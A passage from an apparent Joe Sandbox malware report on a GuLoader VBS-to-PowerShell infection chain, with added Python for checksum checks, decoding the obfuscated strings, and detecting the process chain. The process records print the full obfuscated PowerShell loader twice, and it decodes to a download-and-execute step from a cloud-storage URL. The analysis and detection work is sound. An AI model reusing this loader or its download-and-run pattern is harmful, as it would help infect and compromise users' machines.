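Added example, not part of the Joe Sandbox report. Assumes X-Goog-Hash carries
"crc32c=<base64 of the big-endian CRC32C>" as documented for Google Cloud
Storage. The sample headers and body below are constructed.
"""
import base64
import re
import struct
from typing import Dict, List

# Reflected CRC-32C (Castagnoli polynomial), computed with a byte-wise table.
_POLY = 0x82F63B78
_TABLE: List[int] = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ _POLY if _c & 1 else _c >> 1
    _TABLE.append(_c)


def crc32c(data: bytes) -> int:
    """Standard CRC-32C: init 0xFFFFFFFF, reflected, final XOR 0xFFFFFFFF."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def goog_hash_crc32c(data: bytes) -> str:
    """Encode the checksum the way X-Goog-Hash does: base64 of 4 big-endian bytes."""
    return base64.b64encode(struct.pack(">I", crc32c(data))).decode("ascii")


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse a 'Name: value' header block as shown in the report; repeated names are kept."""
    headers: Dict[str, List[str]] = {}
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def verify_download(raw_headers: str, body: bytes) -> Dict[str, object]:
    """Return the served filename and whether body length and CRC32C match the headers."""
    h = parse_headers(raw_headers)
    result: Dict[str, object] = {"filename": None, "length_ok": None, "crc32c_ok": None}
    m = re.search(r'filename="([^"]*)"', h.get("content-disposition", [""])[0])
    if m:
        result["filename"] = m.group(1)
    if "content-length" in h:
        result["length_ok"] = int(h["content-length"][0]) == len(body)
    for entry in h.get("x-goog-hash", []):          # may list several algorithms
        for part in entry.split(","):
            name, _, value = part.strip().partition("=")
            if name.lower() == "crc32c":
                result["crc32c_ok"] = value == goog_hash_crc32c(body)
    return result


# Constructed sample: same header names as the captured response, tiny body.
SAMPLE_BODY = b"123456789"
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="Eluviates.deploy"
Content-Length: 9
X-Goog-Hash: crc32c=4waSgw==
Server: UploadServer
"""


def check_sample() -> Dict[str, object]:
    return verify_download(SAMPLE_HEADERS, SAMPLE_BODY)


if __name__ == "__main__":
    print(check_sample())
```

            To check the real capture, feed verify_download the response headers from session 1 and the 478,064 bytes that followed them; a crc32c mismatch against cUFqng== means the dump is truncated or altered and should not be used as the analysis artifact.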



            Target ID:0
            Start time:02:52:48
            Start date:03/07/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
            Imagebase:0x7ff62af70000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:02:54:38
            Start date:03/07/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. 
U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. 
CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
            Imagebase:0x7ff6cb6b0000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false
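
            The command line of this process is the whole first PowerShell stage. Its only real obfuscation is the Reeling function: every string literal is a plaintext character preceded by two filler characters, and Reeling walks the literal from index 2 in steps of 3 until it reaches Length-1 (so the last three-character chunk is discarded), with $reinvigorate becoming 1 because $host.CurrentCulture is always set. Everything else is built from those decoded strings and fed to `.` (iex). The decoder below is an added example, not part of the report: reeling() mirrors the PowerShell loop, decode_literals() pulls every `Reeling '...'` argument out of a command line, and is_well_formed() catches a practical problem with copies taken from the rendered report, where runs of spaces inside the literals have been collapsed, which shifts the index and turns the output into garbage. The encoder, the "ab" filler and the assembled SAMPLE_CMDLINE are constructed for the test; the plaintexts are the User-Agent and download URL that the report's HTTP session shows on the wire.

```python
"""Decoder for the Reeling character-interleaving used by this sample's PowerShell stage.

Added example, not part of the Joe Sandbox report. The sample's loop is
    $Mjavende = $Takkende.Length - $reinvigorate        # $reinvigorate == 1
    for ($i = 2; $i -lt $Mjavende; $i += 3) { $out += $Takkende.Substring($i, 1) }
The encoder, filler and sample command line below are constructed test data.
"""
import re
from typing import List


def reeling(encoded: str) -> str:
    """Take the character at index 2, 5, 8, ... while the index is below Length-1."""
    limit = len(encoded) - 1
    return "".join(encoded[i] for i in range(2, limit, 3))


def encode_reeling(plain: str, filler: str = "ab") -> str:
    """Inverse used only to build test vectors: two filler chars before each payload
    char, plus one trailing chunk that the decoder never reads (assumed filler 'ab')."""
    return "".join(filler + ch for ch in plain) + filler + " "


def is_well_formed(encoded: str) -> bool:
    """Each payload char costs three chars and there is a three-char trailer, so a
    length that is not a multiple of 3 means the copy lost characters (typically
    HTML collapsing a run of spaces). Decoding such a copy is not meaningful."""
    return len(encoded) >= 3 and len(encoded) % 3 == 0


# A literal argument to Reeling; PowerShell single-quoted strings escape ' as ''.
_LITERAL = re.compile(r"Reeling\s+'((?:[^']|'')*)'")


def decode_literals(cmdline: str) -> List[str]:
    """Decode every `Reeling '<literal>'` found in a PowerShell command line, in order."""
    out = []
    for m in _LITERAL.finditer(cmdline):
        lit = m.group(1).replace("''", "'")
        out.append(reeling(lit) if is_well_formed(lit) else "<damaged: length %d>" % len(lit))
    return out


# Constructed command line in the sample's shape. The plaintexts are the
# User-Agent and the first download URL seen in the report's HTTP session.
PLAINTEXTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx",
    "iex",
]
SAMPLE_CMDLINE = (
    "$lignings=Reeling '" + encode_reeling(PLAINTEXTS[0]) + "';"
    "$Undgldes=Reeling '" + encode_reeling(PLAINTEXTS[1]) + "';"
    "$Aabningstid=Reeling '" + encode_reeling(PLAINTEXTS[2]) + "';"
)


def decode_sample() -> List[str]:
    return decode_literals(SAMPLE_CMDLINE)


if __name__ == "__main__":
    # The report's own $Aabningstid literal survives intact: ',riS.e axEs ' -> iex
    print(reeling(",riS.e axEs "))
    for s in decode_sample():
        print(s)
```

            For a faithful copy of the literals, take them from the .vbs itself or from PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) rather than from the rendered report.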

            Target ID:10
            Start time:02:54:38
            Start date:03/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6ee680000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:11
            Start time:02:54:43
            Start date:03/07/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Imagebase:0x7ff73b1c0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:02:54:51
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. 
U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. 
CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
            Imagebase:0xc00000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            Target ID:14
            Start time:02:54:52
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Imagebase:0xa40000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true
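
            The five process records above form one chain: wscript.exe (7596) starts a 64-bit powershell.exe (1296) with a multi-kilobyte obfuscated command line; that PowerShell resolves %appdata% by spawning cmd.exe /c "echo %appdata%\Noncongestion.For && echo t"; it then re-launches itself from SysWOW64 with the same command line so the later stage runs as a 32-bit process, and the 32-bit copy repeats the cmd.exe echo. Each hop is something a process-creation log can flag independently of the strings inside the script. The detector below is an added example, not part of the report: it runs four such rules over a list of process events modelled on this chain. The image paths, parent/child relations and the PIDs 7596 and 1296 come from the report; the remaining PIDs and the shortened command line are constructed placeholders.

```python
"""Process-chain detection modelled on the execution chain in this report.

Added example, not part of the Joe Sandbox report. Events are constructed:
images, parentage and PIDs 7596/1296 follow the report, other PIDs and the
shortened command line are placeholders.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LONG_CMDLINE = 1000                     # chars; the real command line is far longer
ENV_ECHO = re.compile(r"\becho\s+%[A-Za-z_]+%", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_wow64_powershell(path: str) -> bool:
    return image_name(path) == "powershell.exe" and "\\syswow64\\" in path.lower()


def detect(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule) findings for the four behaviours seen in the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        img = image_name(e["image"])
        # 1. A script host (wscript/cscript/mshta) starting PowerShell.
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS:
            findings.append((e["pid"], "script_host_spawns_powershell"))
        # 2. Command line long enough to be packed or encoded script.
        if len(e["cmdline"]) > LONG_CMDLINE:
            findings.append((e["pid"], "very_long_cmdline"))
        # 3. 64-bit PowerShell re-launching itself from SysWOW64 (32-bit hop).
        if (is_wow64_powershell(e["image"]) and parent is not None
                and pimg == "powershell.exe" and not is_wow64_powershell(parent["image"])):
            findings.append((e["pid"], "powershell_64_to_32_hop"))
        # 4. PowerShell using cmd.exe only to echo an environment variable.
        if img == "cmd.exe" and pimg == "powershell.exe" and ENV_ECHO.search(e["cmdline"]):
            findings.append((e["pid"], "env_resolution_via_cmd_echo"))
    return findings


# Constructed stand-in for the obfuscated stage: same opening, padded to >1000 chars.
OBF_CMDLINE = ('"powershell.exe" "cls;write \'' + "Betoningerne " * 120
               + "';If (${host}.CurrentCulture) {$reinvigorate++;}\"")
ECHO_CMDLINE = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"'

EVENTS = [
    {"pid": 7596, "ppid": 4000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"'},
    {"pid": 1296, "ppid": 7596, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": OBF_CMDLINE},
    {"pid": 5001, "ppid": 1296, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 5002, "ppid": 1296, "image": r"C:\Windows\System32\cmd.exe", "cmdline": ECHO_CMDLINE},
    {"pid": 5003, "ppid": 1296, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": OBF_CMDLINE},
    {"pid": 5004, "ppid": 5003, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": ECHO_CMDLINE},
]


def detect_sample() -> List[Tuple[int, str]]:
    return detect(EVENTS)


if __name__ == "__main__":
    for pid, rule in detect_sample():
        print(pid, rule)
```

            Rules 1 and 2 fire on the first PowerShell alone; rules 3 and 4 need the parent record, which is why the detector joins on ppid rather than scoring each event in isolation.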

              Memory Dump Source
              • Source File: 00000009.00000002.2717671924.00007FFB4AE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4ae70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a87aca554a612daf7a9ce3290bca0d9c2c8514d613608865fbbba714f125171a
              • Instruction ID: bd014ed655f9eb95a8ebac693f45845292d3c975971aa3faad7a7dd9bc544bd5
              • Opcode Fuzzy Hash: a87aca554a612daf7a9ce3290bca0d9c2c8514d613608865fbbba714f125171a
              • Instruction Fuzzy Hash: 30D18570918A4E8FEBA8EF28C8557E937D1FF68300F14426ED85EC7295CF74A9418B81
              Memory Dump Source
              • Source File: 00000009.00000002.2717671924.00007FFB4AE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4ae70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5271fe16cf82489f4809f107848a8c50e0668ed02f50f6a44d74c0bd6e3558f
              • Instruction ID: d1a5c5e6994f848236b7fa54e83cfa4ccdc71a1a0a45827cb3c30b88c49a089f
              • Opcode Fuzzy Hash: c5271fe16cf82489f4809f107848a8c50e0668ed02f50f6a44d74c0bd6e3558f
              • Instruction Fuzzy Hash: B6D1A470508A4E8FEBA8EF28C8557F977D1FB98301F24826ED85DC7295DF74A9408B81
              Memory Dump Source
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$x.Xk$-Xk
              • API String ID: 0-3576838702
              • Opcode ID: 7c88198748f927f43043ecda94d1e7c494ab42bfa5ee51f1d26717ad586182da
              • Instruction ID: d6085e9532b5aeb108802ce3065dcabfa3087995594b9029479e309a6824d8e6
              • Opcode Fuzzy Hash: 7c88198748f927f43043ecda94d1e7c494ab42bfa5ee51f1d26717ad586182da
              • Instruction Fuzzy Hash: B8C19FB0A01209EBDB24DF64C540FAEBBF2AF89718F549429D8056B755CB71EC83CB61
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: TWk$DUWk$XYgl$XYgl
              • API String ID: 0-3696564657
              • Opcode ID: 32a0978c664dc5f8c89a1402d56237bf7b9fba101d67d64688e0c8dbf44a43be
              • Instruction ID: f1fd7a5b32bc797762ae3bdb528af7ea51576e198918b0acfcbb0d8637401ec6
              • Opcode Fuzzy Hash: 32a0978c664dc5f8c89a1402d56237bf7b9fba101d67d64688e0c8dbf44a43be
              • Instruction Fuzzy Hash: 4F912BB1B0634ACFCB14DB68D5046EEFBA2AFC6614F1490AAD505DF252EB31CD81C7A1
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$(fgl$(fgl
              • API String ID: 0-2919359546
              • Opcode ID: 0d1c0ac62b025bf4fe2d976014c3dd9b15f91a26c28eb7dfeba59a1193584d3f
              • Instruction ID: 02478516303aa7f0b5e6110890ca7d5caf8cc7ddfbb6ac1f8b15e4ce307b40ab
              • Opcode Fuzzy Hash: 0d1c0ac62b025bf4fe2d976014c3dd9b15f91a26c28eb7dfeba59a1193584d3f
              • Instruction Fuzzy Hash: A171B2F4A01206DFDB14DF58C488AAAB7F2AF99718F149469D8059F754CB31EC81CFA1